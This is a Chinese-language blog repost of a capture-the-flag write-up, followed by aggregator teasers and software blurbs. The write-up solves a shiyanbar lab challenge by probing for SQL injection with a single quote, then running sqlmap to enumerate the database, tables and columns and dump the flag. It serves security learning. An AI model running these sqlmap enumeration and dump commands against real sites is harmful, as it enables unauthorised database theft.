这个看起来有点简单!——实验吧-低调大师

这个看起来有点简单!——实验吧

2018-06-07 597

今天有点时间就多写几篇解题思路吧，

希望能够帮助到那些需要帮助的人，

所有的wp都是以一题一篇的形式写出

主要是为了能够让读者更好的阅读以及查找，

希望你们不要责怪！！共勉！！！

这一题做的时间比较久，但是收获颇多！！！！

永远爱你们的————新宝宝

这个看起来有点简单!分值：10

来源：西普学院
难度：易
参与人数：14133人
Get Flag：5392人
答题人数：6278人
解题通过率：86%

很明显。过年过节不送礼，送礼就送这个

格式：

解题链接： http://ctf5.shiyanbar.com/8/index.php?id=1

解题思路：看过视频之后，按照视频的教程解答可是怎么做就是不对，最后发现注入的网址不正确（QAQ），虽然浪费了很长的时间但是总的来说还是值得的；

首先：需要对这个网址进行手工检测是否存在sql注入（经典id=1'加入单引号提交,结果:

如果出现错误提示，则该网站可能就存在注入漏洞）使用sqlmap爆出当前数据库：

使用命令：python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db得到当前数据库：my_db

发现可能存在key于是输入命令：

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db—tables

得到：

再继续：

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey –columns就会得到：

然后把k0y里面值爆出来就好：需要输入：

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

最后得到答案：whatiMyD91dump

您可以考虑给博主来个小小的打赏以资鼓励，您的肯定将是我最大的动力。

作者：落花四月

出处： https://www.cnblogs.com/lxz-1263030049/

关于作者：潜心于网络安全学习。如有问题或建议，请多多赐教！

特此声明：所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误，共同进步。或者直接私信我

声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力！

微信关注我们

原文链接：https://yq.aliyun.com/articles/649102

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

关于一道面试题的极其无聊的python算法实现

题目是这样的：某科技公司两位科学家（甲、乙）去吃饭，坐在一家酒店靠近街道的窗口座位吃饭，在等待上菜的过程中，闲极无聊，甲向乙出了一道猜三个女儿年龄的题目。甲：我有3个女儿，3人年龄之积等于36；乙：猜不出来；甲：3个女儿年龄之和等于街道上的行人数；乙：还是无法确定；甲：我的大女儿叫苏珊。乙：哦，我知道了。请问，甲的3个女儿年龄各是多少？闲着无聊，加上这道题也有点意思，就试着用python写了一下解题思路首先我们要明白题目中给出的线索 1、3个女儿的年龄积为36 2、她们的年龄和已知，但是不能得到最终结果 3、有一个大女儿就这3个条件，就可以得出我们想要的结果,实话说，开始我也是很懵逼，后来仔细想了想，还是有可能的，我们可以这样来做 1、找出积为36的所有可能，并写入列表 2、上面的列表求和，结果不唯一，则为备选答案 3、列表中最大的值唯一怎么样，这样来看是不是清晰多了先来看看，怎么获取所有积为36的列表，我们新建一个函数，然后循环1-36之间的所有可能3次，最后判断3个数字相加为36即写入列表，这里注意，先将列表排序，然后在写入列表的时候就可以判断去重了。 ...

2018-06-08

625

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/qq_34173549/article/details/80627294 通过IP地址和子网掩码与运算计算相关地址 http://blog.csdn.net/perddy/article/details/3137637 1、TCP/IP 1.1 TCP/IP四层模型 http://blog.csdn.net/hbtj_1216/article/details/76472747 1.2 IP、TCP、UDP首部详解 http://blog.csdn.net/hbtj_1216/article/details/76473088 1.3 IP是面向无连接的协议 IP是面向无连接的。在发包之前，不需要建立与对端目标地址之间的连接。上层如果有发送给IP的数据，该数据会立即被压缩成IP包发送出去。可能存在的问题：丢包、错位、数据量翻倍等。为什么IP要采用面向无连接的呢？主要有两点原因：（1）为了简化；（2）为了提速。面向连接比面向无连接处理相对复杂。甚至管理每个连接本身就是一个相当繁琐的事情。此外...

2018-06-08

617

资源下载

更多资源

优质分享App

近一个月的开发和优化，本站点的第一个app全新上线。该app采用极致压缩，本体才4.36MB。系统里面做了大量数据访问、缓存优化。方便用户在手机上查看文章。后续会推出HarmonyOS的适配版本。

Oracle

Oracle Database，又名Oracle RDBMS，或简称Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说Oracle数据库系统是目前世界上流行的关系数据库管理系统，系统可移植性好、使用方便、功能强，适用于各类大、中、小、微机环境。它是一种高效率、可靠性好的、适应高吞吐量的数据库方案。

Eclipse

Eclipse 是一个开放源代码的、基于Java的可扩展开发平台。就其本身而言，它只是一个框架和一组服务，用于通过插件组件构建开发环境。幸运的是，Eclipse 附带了一个标准的插件集，包括Java开发工具（Java Development Kit，JDK）。

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能，例如代码缩略图，Python的插件，代码段等。还可自定义键绑定，菜单和工具栏。Sublime Text 的主要功能包括：拼写检查，书签，完整的 Python API ， Goto 功能，即时项目切换，多选择，多窗口等等。Sublime Text 是一个跨平台的编辑器，同时支持Windows、Linux、Mac OS X等操作系统。